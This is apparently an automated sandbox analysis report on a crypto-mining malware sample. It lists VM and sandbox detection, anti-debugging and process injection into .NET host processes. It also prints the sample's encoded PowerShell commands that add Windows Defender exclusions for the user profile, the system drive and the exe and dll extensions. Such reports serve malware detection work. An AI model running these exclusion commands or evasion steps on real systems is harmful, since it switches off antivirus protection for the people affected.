                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeSystem information queried: FirmwareTableInformation
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: CryptoMiner.exe, 00000000.00000002.548299358.00000000007EA000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ~DBGHELP.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLCMDVRT64.DLLCMDVRT32.DLLSBIEDLL.DLLBGAGENT.DLL
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5052Thread sleep time: -23058430092136925s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1500Thread sleep count: 1207 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1500Thread sleep count: 3018 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\CryptoMiner.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Users\user\Desktop\CryptoMiner.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4771
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1207
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3018
                    Source: C:\Users\user\Desktop\CryptoMiner.exeAPI coverage: 6.4 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\CryptoMiner.exeAPI call chain: ExitProcess graph end node
                    Source: InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
                    Source: fname.exe.12.drBinary or memory string: noreply@vmware.com0
                    Source: fname.exe.12.drBinary or memory string: http://www.vmware.com/0
                    Source: fname.exe.12.drBinary or memory string: VMware, Inc.1!0
                    Source: fname.exe.12.drBinary or memory string: http://www.vmware.com/0/
                    Source: fname.exe.12.drBinary or memory string: VMware, Inc.1
                    Source: fname.exe.12.drBinary or memory string: VMware, Inc.0
                    Source: InstallUtil.exe, 0000000C.00000002.649001825.0000000000FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: InstallUtil.exe, 0000000C.00000002.650039113.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFW
                    Source: C:\Users\user\Desktop\CryptoMiner.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA5E29 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D79280 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D792A0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DD4C2A mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DC9A49 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DBDB50 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\CryptoMiner.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D968D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA664D __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D968D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D9C891 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Encrypted powershell cmdline option found
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\CryptoMiner.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page read and write
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\CryptoMiner.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\CryptoMiner.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\CryptoMiner.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AFB008
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4FAE008
                    .NET source code references suspicious native API functions
                    Source: 0.3.CryptoMiner.exe.d730000.0.unpack, SystemNetMimeQEncodedStreamReadStateInfok.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                    Source: 0.3.CryptoMiner.exe.d730000.1.unpack, SystemNetMimeQEncodedStreamReadStateInfok.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                    Source: filename.exe.12.dr, u206c???????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
                    Source: 12.0.InstallUtil.exe.400000.0.unpack, SystemNetMimeQEncodedStreamReadStateInfok.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                    Source: 12.2.InstallUtil.exe.400000.0.unpack, SystemNetMimeQEncodedStreamReadStateInfok.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                    Source: 12.0.InstallUtil.exe.400000.1.unpack, SystemNetMimeQEncodedStreamReadStateInfok.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                    Source: 20.3.fname.exe.2f70000.0.unpack, u000fu2005.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
                    Source: 22.2.AppLaunch.exe.400000.0.unpack, u000fu2005.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                    Source: C:\Users\user\Desktop\CryptoMiner.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Local\Temp\fname.exe "C:\Users\user\AppData\Local\Temp\fname.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user\AppData\Local\Temp\filename.exe"
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: GetLocaleInfoA,
